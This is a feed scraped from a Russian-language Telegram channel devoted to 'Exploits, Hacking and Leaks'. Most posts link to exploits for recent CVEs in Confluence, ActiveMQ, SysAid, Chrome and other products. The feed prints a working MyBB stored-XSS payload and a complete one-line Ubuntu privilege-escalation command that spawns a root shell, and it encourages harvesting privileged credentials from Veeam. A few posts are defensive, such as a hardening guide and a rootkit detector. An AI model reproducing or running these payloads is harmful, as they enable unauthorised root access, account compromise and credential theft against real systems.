Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
List of Awesome CobaltStrike Resources
link

#cobalt
👍10
Give me a ping, Vasily
👍19😱2
Linux hardening guide
Интересная версия еще одного гайда по усилению безопасности linux.
Интересно про ptrace и memory allocator
LINK
👍26🔥1
Maltrail - Система обнаружения вредоносного трафика
RCE Exploit (version Maltrail-0.53)
*
exploit.py
👍11
CVE-2023-22518
Confluence Data Center и Confluence Server

*
exploit.py
🔥9👍5
CVE-2023-46251 - Stored DOM XSS
MyBB < 1.8.37
usage:
[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]

UPD: impact
🔥12👍4😱3
Надо ребрендинг канала делать, просто золото )
🔥29😱1
VEEAM 😋
Это кладезь привилегированных учетных записей (AD, Linux, Cloud)
Лежат себе плохо привинченные, осталось только забрать.

В общем читаем и погружаемся:
1 - From VEEAM to Domain Administrator
2 - Decrypting VEEAM Passwords
3 - Используем тулзу SharpVeeamDecryptor

#veeam #passwd
🔥18😱4
CVE-2023-46604 ActiveMQ RCE
exploit + xml

#activemq
👍8🔥5
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.

Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:

— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.

Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
🔥12👍1
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"

#ubuntu #lpe
🔥38👍2
update для CVE-2023-32629 и CVE-2023-2640
BashСИшечка такая
🔥28👍4👌2
ved-ebpf: Kernel Exploit and Rootkit Detection using eBPF
статья - тут
Тулза VED-eBPF - тут

#kernel #linux #ebpf #rootkit
👍10
200+ PDF
Hacking and Infosec
Link
👍29🔥1
OpenVPN CVE-2023-46849 CVE-2023-46850
делить на ноль не бросим 😄😄😄
👍9👌6🔥2
Напоминаем !
Завтра пройдет встреча DEFCON Russia
*
* Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен»
* Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)
* Формат: офлайн + онлайн-трансляция
* зарегистрироваться
*
Приходите, пообщаемся 😜

#defcon #spb
👍8🔥4😱1
This media is not supported in your browser
VIEW IN TELEGRAM
С днем рождения !!!
Сегодня Proxy Bar исполняется 2 года
***
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9
Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k

#ДеньРождения
🔥100👍8😱4👌2
CVE-2023-47246
А вот и 0day который активно юзают рансомы из Cl0p нацеленный на SysAid
*
exploit
*
👍22
CVE-2023-4357 Chrome XXE
*
POC
прикольно, осталось песочницу обойти 👌

#chrome #sandbox
👍18😱8🔥2